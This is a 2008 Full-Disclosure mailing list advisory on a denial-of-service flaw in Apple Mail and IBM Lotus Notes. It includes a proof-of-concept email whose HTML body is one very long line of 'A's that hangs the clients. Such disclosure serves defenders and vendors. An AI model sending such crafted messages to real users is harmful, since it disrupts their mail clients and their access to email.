[Full-disclosure] Apple Mail Denial of Service Vulnerability (with bonus IBM Lotus Notes DoS!)

From: David Wharton <security@xxxxxxxxxxxxxxx>
Date: Thu, 29 May 2008 19:31:39 -0500

***Summary***

A maliciously crafted e-mail message can cause a denial of service in
multiple versions of the Apple Mail email client.

***Scope***

Apple Mail version 3.1 (914/915)
Apple Mail version 3.2 (919/919.2)

Note: other versions of this product may be vulnerable as well; I have
not tested them. The vendor has been made aware of this issue and has
chosen not to treat it as a security issue.

Interestingly enough, a similar issue seems to be present in multiple
versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z -- http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611)
. The exploit provided in this advisory will also cause a denial of
service condition on multiple versions of IBM Lotus Notes. IBM has
been kind enough to create SPR# PRAD7DPKLW to address the issue the
exploit targets.

***Description***

An email message with a maliciously crafted body (in my tests I used a
long line) can cause the e-mail client to hang, resulting in a denial
of service condition. Testing with emails that do not have any
newline characters (0x0A, 0x0D) or spaces (0x20) shows that a line
consisting of 1.5 MB can cause the email clients to hang for over half
an hour.

Initial testing reveals the following:

In Apple Mail, the e-mail is rendered correctly in the preview pane
but a subsequent click on a different e-mail causes the application to
hang.

***Credits***

David Wharton

***References***

Apple Mail
http://www.apple.com/macosx/features/mail.html

***PoC Exploit***

Below is a sample e-mail with headers (some headers removed or
modified) that causes the e-mail clients to hang as discussed. Note
that the body is one long line and the "=" character is not part of;
it is there for formatting but in reality most of the body is one long
contiguous string of A's.

Subject: dos test
MIME-Version: 1.0
From: xxxxx@xxxxxxxxx
To: xxxxx@xxxxxxxxx
Date: xxxxx
Message-ID: <xxxxx.xxxxx-xxxxx.xxxxx-xxxxx.xxxxx@xxxxxxxxx>
X-Mailer: xxxxx
MIME-Version: 1.0
Content-Type: text/html;
charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0
X-CTASD-IP: xxx.xxx.xxx.xxx
X-CTASD-Sender: xxxxx@xxxxxxxxx
x-ctasd: uncategorized
x-ctasd-vod: uncategorized
x-ctasd-station:
X-OriginalArrivalTime: xxxxx@

<font
size=3D"2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
<snip> (removed a few thousand 'A's)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</
font>N=
OTICE: This e-mail message and all attachments transmitted with it
may con=
tain confidential information intended solely for the use of the
addressee.=
<br />=

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Greetz security community members
Next by Date: [Full-disclosure] Request for Information on Exploit 'Novell eDirectory evtFilteredMonitorEventsRequest() function Buffer Overflow vulnerability'
Previous by thread: [Full-disclosure] Greetz security community members
Next by thread: [Full-disclosure] Request for Information on Exploit 'Novell eDirectory evtFilteredMonitorEventsRequest() function Buffer Overflow vulnerability'
Index(es):
- Date
- Thread

Relevant Pages

Re: File Attachment Size Changing
... Operating System: ... Email Client: pop ... when the email bounced back from intended recipient due to it being over 10 ... No big deal I suppose as I can just use Apple mail instead. ...
(microsoft.public.mac.office.entourage)
Re: VM/VFS bug with large amount of memory and file systems?
... in Apple Mail (my email client). ... before each 'wrapping' newline. ... mailer appears to), then it will properly unwrap the lines and resend ...
(Linux-Kernel)
Re: VM/VFS bug with large amount of memory and file systems?
... in Apple Mail. ... It must be your email client that is wrapping them... ... So a wrapped line has a single space character right before each 'wrapping' newline. ... If your mail client supports format=flowed viewing and sends without format=flowed (like AKPM's mailer appears to), then it will properly unwrap the lines and resend without the wrapping. ...
(Linux-Kernel)
Apple Mail doesnt export old messages to Entourage 2008
... Email Client: pop ... I was able to successfuly export my accounts from Apple Mail to Entourage as well as the contacts list. ...
(microsoft.public.mac.office.entourage)